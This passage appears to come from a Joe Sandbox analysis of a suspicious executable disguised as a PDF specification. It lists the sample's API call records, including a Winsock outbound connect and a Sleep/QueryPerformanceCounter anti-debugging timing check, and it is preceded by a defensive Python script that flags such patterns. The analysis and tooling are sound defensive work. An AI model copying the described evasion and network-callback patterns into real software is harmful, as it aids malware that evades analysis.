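The two records above, the Winsock socket/connect sequence at 004653FE..00465481 and the Sleep/QueryPerformanceCounter pair at 00434598..004345DE, are the kind of entries worth pulling automatically out of a report with thousands of function records. The script below is an added example, not code from Joe Sandbox or from the analysed sample: it parses the text form of these function records, flags the execution-timing check and the outbound socket connect, and decodes the socket() arguments the report prints (00000002, 00000001, 00000006 are AF_INET, SOCK_STREAM, IPPROTO_TCP). The three records in SAMPLE_REPORT are copied from this page; the two patterns and the Winsock constant tables are the example's own choices, not anything the report defines.

```python
"""
Triage helper for the per-function "APIs" records in a Joe Sandbox report.

Added example, not code from Joe Sandbox or from the analysed sample. It parses
the text form of the function records shown on this page and flags two API
patterns a reviewer would want surfaced from thousands of such records:
  - an execution-timing check (Sleep and QueryPerformanceCounter in one function)
  - a Winsock client connection (socket + connect through WSOCK32 / WS2_32)
SAMPLE_REPORT below is constructed from three records on this page.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API reference as the report prints it, e.g.
#   • connect.WSOCK32(00000000,?,00000010), ref: 00465446
# Lines prefixed "Part of subcall function XXXXXXXX:" belong to that callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str                  # call-site address inside the dumped image
    subcall: Optional[str]    # callee address when the call sits in a subcall

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""

    def direct(self):
        """Calls made by this function itself, excluding subcall attributions."""
        return [c for c in self.calls if c.subcall is None]

def parse_records(text: str):
    """Split report text into FunctionRecords; a record ends at its Instruction Fuzzy Hash."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source" and current is None):
            current = FunctionRecord()
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current.calls.append(ApiCall(m["api"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            current.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            records.append(current)
            current = None
    return records

# Winsock constants as they appear in the report's hex argument lists (example's own table).
_FAMILY = {"00000002": "AF_INET", "00000017": "AF_INET6"}
_TYPE = {"00000001": "SOCK_STREAM", "00000002": "SOCK_DGRAM"}
_PROTO = {"00000000": "IPPROTO_DEFAULT", "00000006": "IPPROTO_TCP", "00000011": "IPPROTO_UDP"}

def describe_socket(args: str) -> str:
    """Decode socket(af, type, protocol) from the report's argument string."""
    p = [a.strip() for a in args.split(",")]
    if len(p) < 3:
        return "unknown"
    return "/".join((_FAMILY.get(p[0], p[0]), _TYPE.get(p[1], p[1]), _PROTO.get(p[2], p[2])))

def triage(rec: FunctionRecord):
    """Return human-readable findings for one record (empty list if nothing matched)."""
    findings = []
    direct = rec.direct()
    names = {c.api for c in direct}
    # Sleep bracketed by QueryPerformanceCounter is the "did that take too long"
    # check the report flags as execution timing used to detect debuggers.
    if {"Sleep", "QueryPerformanceCounter"} <= names:
        refs = ", ".join(c.ref for c in direct if c.api in ("Sleep", "QueryPerformanceCounter"))
        findings.append(f"execution-timing check (Sleep + QueryPerformanceCounter) at {refs}")
    sock = [c for c in rec.calls if c.module.upper() in ("WSOCK32", "WS2_32")]
    by_name = {c.api: c for c in sock}
    if "socket" in by_name and "connect" in by_name:
        s, c = by_name["socket"], by_name["connect"]
        findings.append(
            f"Winsock client connect ({describe_socket(s.args)}) via {s.module}, "
            f"socket at {s.ref}, connect at {c.ref}"
        )
    return findings

def triage_report(text: str):
    """(opcode_id, findings) for every record in the text, in report order."""
    return [(r.opcode_id, triage(r)) for r in parse_records(text)]

# Constructed input: three records copied from this page.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
Similarity
• API ID: CounterPerformanceQuerySleep
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Memory Dump Source
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
"""

if __name__ == "__main__":
    for opcode_id, findings in triage_report(SAMPLE_REPORT):
        print(opcode_id[:16], findings or "-")
```

Run it directly to print one line per record keyed by Opcode ID. Subcall attributions are kept on the record but excluded from the timing match, so a function that merely calls a helper containing Sleep is not flagged; the pattern list is deliberately small and is the place to add the other API sequences the report's signatures describe.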
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                              • MessageBeep.USER32(00000000), ref: 00460C46
                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                              • EndDialog.USER32(?,00000001), ref: 00460C83
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$Icon
                              • String ID:
                              • API String ID: 4023252218-0
                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                              APIs
                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                              • String ID:
                              • API String ID: 1489400265-0
                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyWindow.USER32(?), ref: 00455728
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                              • String ID:
                              • API String ID: 1042038666-0
                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                              APIs
                              • __getptd.LIBCMT ref: 0041780F
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __getptd.LIBCMT ref: 00417826
                              • __amsg_exit.LIBCMT ref: 00417834
                              • __lock.LIBCMT ref: 00417844
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 2403457894-0
                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 4247068974-0
                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$U$\
                              • API String ID: 0-3705770531
                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 0046E505
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                              • CoUninitialize.OLE32 ref: 0046E53D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 708495834-557222456
                              • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
